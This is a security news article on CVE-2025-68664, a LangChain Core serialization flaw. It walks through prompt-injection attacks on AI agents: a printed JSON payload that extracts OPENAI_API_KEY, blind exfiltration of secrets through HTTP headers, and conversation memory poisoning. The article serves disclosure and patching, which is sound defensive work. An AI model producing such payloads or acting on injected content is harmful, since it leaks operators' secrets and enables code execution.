
On December 24, 2025, security researcher Yarden Porat disclosed CVE-2025-68664 (“LangGrinch”), a critical serialization injection vulnerability in LangChain Core with a CVSS score of 9.3/10. The vulnerability enables attackers to extract secrets and execute code via prompt injection by exploiting how LangChain’s dumps() and dumpd() functions handle dictionaries containing the ‘lc’ marker key. With LangChain Core at 847 million total downloads and powering thousands of production AI agents, this vulnerability exposes a fundamental security gap: AI frameworks are trusting LLM outputs as if they’re benign internal data, when they’re actually untrusted user inputs.
The vulnerability was patched within weeks, but it reveals a systemic problem in AI development. LangChain prioritized developer convenience (secrets loaded automatically by default) over security boundaries. This pattern is repeating across the AI industry, and developers building AI agents need to understand the trade-offs before production deployments.
How the ‘lc’ Marker Exploit Works
LangChain uses an ‘lc’ marker key internally to identify serialized objects during dumps/loads operations. The vulnerability exists because dumps() and dumpd() functions didn’t escape user-controlled dictionaries containing this marker. When LLM outputs (which can be manipulated via prompt injection) include this structure, the deserializer treats them as legitimate LangChain objects instead of untrusted user data.
Yarden Porat explained: “What makes this finding interesting is that the vulnerability lives in the serialization path, not the deserialization path. In agent frameworks, structured data produced downstream of a prompt is often persisted, streamed and reconstructed later. That creates a surprisingly large attack surface reachable from a single prompt.”
The most common attack vector involves LLM response fields like additional_kwargs or response_metadata. Attackers craft prompts that cause the LLM to generate metadata containing the ‘lc’ marker structure. When this data is serialized and later deserialized during streaming operations, the injected payload executes. Moreover, the vulnerability isn’t in the deserialization code (which is often hardened) but in the serialization path – an often-overlooked attack surface.
The Convenience Trap: Insecure Defaults
The most dangerous aspect of this vulnerability was the default setting secrets_from_env=True, which automatically loaded secrets from environment variables during deserialization. This design choice prioritized developer convenience (“just works”) over security boundaries. Attackers could inject a simple payload to extract API keys:
{"lc": 1, "type": "secret", "id": ["OPENAI_API_KEY"]}
When deserialized, this structure automatically resolved and revealed the OPENAI_API_KEY environment variable. The patch changed this default to False, introducing breaking changes for teams relying on automatic secret loading.
Consequently, this is a pattern across the AI industry: frameworks optimizing for “getting started in 5 minutes” at the expense of security fundamentals. The convenience-first approach works until it doesn’t. At 847 million downloads, the blast radius is massive. Furthermore, LangChain reached a $1.1 billion valuation before addressing this fundamental security boundary.
Massive Scope: 847M Downloads Affected
LangChain Core has 847 million total downloads and 98 million monthly downloads as of late December 2025. The framework is used by 1,306 verified companies including Klarna, Snowflake, Boston Consulting Group, and Microsoft, with 132,000+ LLM applications built on it. The vulnerability affects Python versions prior to 0.3.81 and versions 1.0.0 through 1.2.4, plus JavaScript versions prior to 0.3.29.
Additionally, security researchers identified 12 distinct vulnerable code flows across common use cases: event streaming, logging, message history/memory, and caches. The LangChain team awarded a $4,000 bug bounty – the maximum in the project’s history – recognizing the severity and thoroughness of Porat’s disclosure.
Related: AI Verification Gap: 96% Don’t Trust Code, 48% Check
This isn’t a niche library – it’s foundational infrastructure for AI agents across enterprises. Every company running LangChain agents needed to audit and patch immediately. The combination of widespread adoption, critical vulnerability, and convenient defaults created massive potential for exploitation.
Beyond Secret Extraction: Blind Attacks and Memory Poisoning
The vulnerability enables attacks beyond simple secret extraction. Blind exfiltration attacks leverage the ChatBedrockConverse class from langchain_aws, which performs a network GET request immediately upon construction. Attackers control the endpoint URL and populate HTTP headers with values from environment variables. In fact, the attacker doesn’t need to see the LLM response – they simply set up a server to receive the HTTP request with secrets in the headers.
Conversation memory poisoning presents another attack vector. Attackers inject malicious serialized objects into agent conversation history that trigger on subsequent loads. These attacks are not theoretical – they’re practical exploitation patterns that security researchers documented. The blind exfiltration is particularly dangerous because traditional output monitoring won’t catch it.
Patch Now: Immediate Actions Required
Patches are available in langchain-core 1.2.5+ and 0.3.81+ (Python), and @langchain/core 0.3.29+ (JavaScript). The fix introduces new restrictive defaults:
# BEFORE patch (VULNERABLE):
data = loads(serialized_data, secrets_from_env=True) # Default was True
# AFTER patch (SECURE):
data = loads(serialized_data, secrets_from_env=False) # Default now False
data = loads(serialized_data, allowed_objects=["specific.classes"]) # Allowlist
Organizations must take immediate action. First, update to patched versions. Second, audit all serialization and deserialization code paths in your LangChain deployments. Third, review environment variable handling and ensure secrets_from_env is disabled. Fourth, implement least-privilege access controls for AI agents. Fifth, treat all LLM outputs as untrusted user inputs requiring validation. Read the full security advisory for complete patch guidance.
Key Takeaways
- Update immediately to langchain-core 1.2.5+/0.3.81+ or @langchain/core 0.3.29+ – this is a critical patch for production AI agents
- Audit serialization flows – review all dumps/loads operations, especially in streaming, logging, memory, and cache code paths
- Disable secrets_from_env – if not already disabled by patch, explicitly set to False and implement secure secret management
- Treat LLM outputs as untrusted – AI frameworks must recognize that LLM-generated data is user input requiring the same validation as external data
- Challenge convenience-first design – the AI industry’s “ship fast” mentality created a $1.1B company with fundamental security gaps; security must be prioritized from day one











